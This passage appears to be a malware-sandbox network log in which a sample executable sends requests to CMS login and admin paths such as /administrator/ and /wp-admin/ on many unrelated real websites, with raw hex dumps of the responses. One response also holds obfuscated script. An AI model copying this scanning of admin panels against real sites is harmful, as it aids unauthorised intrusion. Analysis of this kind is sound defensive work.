                                                                                                                                                                                                    2023-11-26 05:59:35 UTC13079INData Raw: 20 34 30 2e 38 37 34 39 20 33 33 2e 30 35 31 39 20 34 31 2e 30 37 30 35 20 33 33 2e 34 35 33 39 4c 34 31 2e 39 33 39 37 20 33 35 2e 31 39 32 34 43 34 32 2e 30 39 31 38 20 33 35 2e 34 38 35 37 20 34 32 2e 33 37 34 33 20 33 35 2e 36 34 38 37 20 34 32 2e 36 37 38 35 20 33 35 2e 36 34 38 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 33 2e 30 39 35 34 20 33 30 2e 34 32 32 35 43 33 33 2e 32 31 34 39 20 33 30 2e 34 32 32 35 20 33 33 2e 33 34 35 33 20 33 30 2e 33 39 20 33 33 2e 34 35 33 39 20 33 30
                                                                                                                                                                                                    Data Ascii: 40.8749 33.0519 41.0705 33.4539L41.9397 35.1924C42.0918 35.4857 42.3743 35.6487 42.6785 35.6487Z" fill="white" ></path> <path d="M33.0954 30.4225C33.2149 30.4225 33.3453 30.39 33.4539 30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    161192.168.2.458359120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC248OUTGET /login/?page=%2Fadministrator%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC546INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 33 20 53 65 65 20 4f 74 68 65 72 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 303 See OtherServer: nginxDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    162192.168.2.45868478.128.62.1384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.integraledu.hr
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC998INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6d 31 4b 4e 48 42 61 4f 45 39 47 63 33 4e 46 4e 7a 64 70 62 45 5a 4b 51 58 6c 7a 53 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 46 46 46 54 45 56 59 4d 6c 6c 52 61 44 68 53 53 6b 64 6e 52 30 59 30 65 45 64 33 62 55 56 4c 65 6a 67 79 4e 6c 56 75 5a 32 4a 4d 63 6c 6c 32 5a 55 70 78 59 55 70 77 55 31 42 32 54 6d 30 34 57
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6Im1KNHBaOE9Gc3NFNzdpbEZKQXlzSnc9PSIsInZhbHVlIjoiSFFFTEVYMllRaDhSSkdnR0Y0eEd3bUVLejgyNlVuZ2JMcll2ZUpxYUpwU1B2Tm04W
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC8192INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 68 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="hr"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <meta name="description" content=""> <meta property="fb:app_id" content="">
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC8192INData Raw: 73 69 6f 6e 61 6c 6e 6f 2d 75 73 6d 6a 65 72 61 76 61 6e 6a 65 22 20 64 61 74 61 2d 67 72 6f 75 70 3d 22 2f 73 74 75 64 69 72 61 6e 6a 65 2d 75 2d 69 6e 6f 7a 65 6d 73 74 76 75 22 3e 50 72 6f 67 72 61 6d 20 70 72 6f 66 65 73 69 6f 6e 61 6c 6e 65 20 6f 72 69 6a 65 6e 74 61 63 69 6a 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 65 70 2d 63 6f 75 72 73 65 73 2f 69 65 6c 74 73 22 20 64 61 74 61 2d 67 72 6f 75 70 3d 22 2f 73 74 75 64 69 72 61 6e 6a 65 2d 75 2d 69 6e 6f 7a 65 6d 73 74 76 75 22 3e 49 45
                                                                                                                                                                                                    Data Ascii: sionalno-usmjeravanje" data-group="/studiranje-u-inozemstvu">Program profesionalne orijentacije</a></li> <li><a href="/prep-courses/ielts" data-group="/studiranje-u-inozemstvu">IE
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC8192INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 31 2d 69 74 65 6d 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 74 65 63 61 6a 65 76 69 2d 73 74 72 61 6e 69 68 2d 6a 65 7a 69 6b 61 22 20 64 61 74 61 2d 67 72 6f 75 70 3d 22 2f 74 65 63 61 6a 65 76 69 2d 73 74 72 61 6e 69 68 2d 6a 65 7a 69 6b 61 22 20 63 6c 61 73 73 3d 22 20 6e 61 76 2d 6c 31 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: </li> <li class="nav-l1-item"> <a href="/tecajevi-stranih-jezika" data-group="/tecajevi-stranih-jezika" class=" nav-l1-link">
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    163192.168.2.45871634.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC224OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://tiswheels.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC485INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 37 32 31 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 50 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 127217Connection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EnginePr
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC15899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 41 57 2d 39 38 37 39 32 39 36 30 33 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 20 67
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head >... Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id=AW-987929603"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} g
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16384INData Raw: 75 76 29 2b 73 28 75 37 2e 75 78 2c 75 37 2e 75 69 29 2b 73 28 75 37 2e 75 41 2c 75 37 2e 59 29 2b 27 6f 72 27 5d 5b 73 28 75 37 2e 75 79 2c 75 37 2e 75 57 29 2b 73 28 75 37 2e 75 6e 2c 75 37 2e 75 46 29 2b 73 28 75 37 2e 75 52 2c 75 37 2e 75 65 29 5d 5b 73 28 75 37 2e 75 6a 2c 75 37 2e 75 6b 29 2b 27 64 27 5d 28 4c 29 2c 76 3d 4b 5b 6d 5d 2c 78 3d 4a 5b 76 5d 7c 7c 54 3b 54 5b 73 28 75 37 2e 75 43 2c 75 37 2e 59 29 2b 73 28 75 37 2e 75 64 2c 75 37 2e 75 73 29 2b 73 28 75 37 2e 75 51 2c 75 37 2e 75 68 29 5d 3d 4c 5b 73 28 75 37 2e 75 49 2c 75 37 2e 75 71 29 2b 27 64 27 5d 28 4c 29 2c 54 5b 73 28 75 37 2e 75 50 2c 75 37 2e 75 65 29 2b 73 28 75 37 2e 75 7a 2c 75 37 2e 75 65 29 2b 27 6e 67 27 5d 3d 78 5b 73 28 75 37 2e 75 4d 2c 75 37 2e 75 55 29 2b 73 28 75
                                                                                                                                                                                                    Data Ascii: uv)+s(u7.ux,u7.ui)+s(u7.uA,u7.Y)+'or'][s(u7.uy,u7.uW)+s(u7.un,u7.uF)+s(u7.uR,u7.ue)][s(u7.uj,u7.uk)+'d'](L),v=K[m],x=J[v]||T;T[s(u7.uC,u7.Y)+s(u7.ud,u7.us)+s(u7.uQ,u7.uh)]=L[s(u7.uI,u7.uq)+'d'](L),T[s(u7.uP,u7.ue)+s(u7.uz,u7.ue)+'ng']=x[s(u7.uM,u7.uU)+s(u
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC16384INData Raw: 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 69 73 77 68 65 65 6c 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 63 73 73 2f 63 75 73 74 6f 6d 2d 66 72 6f 6e 74 65 6e 64 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 36 39 38 38 34 39 39 33 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 73 77 69 70 65 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 69 73 77 68
                                                                                                                                                                                                    Data Ascii: edia='all' /><link rel='stylesheet' id='elementor-frontend-css' href='https://tiswheels.com/wp-content/uploads/elementor/css/custom-frontend.min.css?ver=1698849933' type='text/css' media='all' /><link rel='stylesheet' id='swiper-css' href='https://tiswh
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC16384INData Raw: 74 3b 32 26 71 75 6f 74 3b 7d 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 6a 65 74 2d 63 61 72 6f 75 73 65 6c 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 6a 65 74 2d 63 61 72 6f 75 73 65 6c 20 6a 65 74 2d 65 6c 65 6d 65 6e 74 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 63 61 72 6f 75 73 65 6c 2d 77 72 61 70 20 6a 65 74 2d 65 71 75 61 6c 2d 63 6f 6c 73 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 63 61 72 6f 75 73 65 6c 22 20 64 61 74 61 2d 73 6c 69 64 65 72 5f 6f 70 74 69 6f 6e 73 3d 22 7b 26 71 75 6f 74 3b 61 75 74
                                                                                                                                                                                                    Data Ascii: t;2&quot;}" data-widget_type="jet-carousel.default"><div class="elementor-widget-container"><div class="elementor-jet-carousel jet-elements"><div class="jet-carousel-wrap jet-equal-cols"><div class="jet-carousel" data-slider_options="{&quot;aut
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC16384INData Raw: 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 2d 69 6e 6e 65 72 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 20 6a 65 74 2d 6d 65 6e 75 2d 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 79 70 65 2d 66 61 64 65 20 6a 65 74 2d 6d 65 6e 75 2d 2d 72 6f 6c 6c 2d 75 70 22 3e 3c 6c 69 20 69 64 3d 22 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 2d 38 32 32 22 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6a 65 74 2d 68 61 73 2d 72 6f 6c 6c 2d 75 70 20 6a 65
                                                                                                                                                                                                    Data Ascii: ner"><div class="jet-menu-container"><div class="jet-menu-inner"><ul class="jet-menu jet-menu--animation-type-fade jet-menu--roll-up"><li id="jet-menu-item-822" class="jet-menu-item jet-menu-item-type-post_type jet-menu-item-object-page jet-has-roll-up je
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC16384INData Raw: 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 50 46 6f 6f 74 65 72 22 3e 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 32 32 30 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 32 32 30 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2d 74 79 70 65 3d 22 65 6c 65 6d 65 6e 74 6f 72 5f 6c 69 62 72 61 72 79 22 3e 0a 09 09 09 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 65
                                                                                                                                                                                                    Data Ascii: e="itemscope" itemtype="http://schema.org/WPFooter"><div data-elementor-type="footer" data-elementor-id="220" class="elementor elementor-220" data-elementor-post-type="elementor_library"><section class="elementor-section elementor-top-section e
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC16384INData Raw: 75 6f 74 3b 73 69 7a 65 26 71 75 6f 74 3b 3a 35 30 2c 26 71 75 6f 74 3b 73 69 7a 65 73 26 71 75 6f 74 3b 3a 5b 5d 7d 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 73 63 72 6f 6c 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 64 69 72 65 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 66 78 5f 64 69 72 65 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 7a 5f 69 6e 64 65 78 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6a 65 74
                                                                                                                                                                                                    Data Ascii: uot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:null,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC13014INData Raw: 2b 30 78 31 37 2a 30 78 31 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 66 28 47 53 2e 49 29 29 2f 28 30 78 31 36 65 66 2b 2d 30 78 32 32 37 30 2b 30 78 62 38 62 29 3b 69 66 28 55 3d 3d 3d 5a 29 62 72 65 61 6b 3b 65 6c 73 65 20 76 5b 27 70 75 73 68 27 5d 28 76 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 52 29 7b 76 5b 27 70 75 73 68 27 5d 28 76 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 46 2c 2d 30 78 31 32 63 34 32 64 2b 30 78 31 32 36 36 34 33 2b 30 78 33 63 2a 30 78 32 64 32 33 29 29 3b 66 75 6e 63 74 69 6f 6e 20 46 28 29 7b 76 61 72 20 5a 39 3d 5b 27 6c 65 63 27 2c 27 64 6e 73 27 2c 27 34 33 31 37 31 36 38 77 68 43 4f 72 5a 27 2c 27 36 32 36 39 38 79 42 4e 6e 4d 50 27 2c 27 74 72 69 27 2c 27 69 6e 64 27 2c 27 2e 63 6f 27 2c 27 65 61
                                                                                                                                                                                                    Data Ascii: +0x17*0x16)+-parseInt(f(GS.I))/(0x16ef+-0x2270+0xb8b);if(U===Z)break;else v['push'](v['shift']());}catch(R){v['push'](v['shift']());}}}(F,-0x12c42d+0x126643+0x3c*0x2d23));function F(){var Z9=['lec','dns','4317168whCOrZ','62698yBNnMP','tri','ind','.co','ea


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    164192.168.2.458930162.241.62.2204436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC226OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://lumaruniformes.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC417INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressUpgrade: h2,h2cConnection: Upgrade, closeLocation: https://


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    165192.168.2.4584623.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC177OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
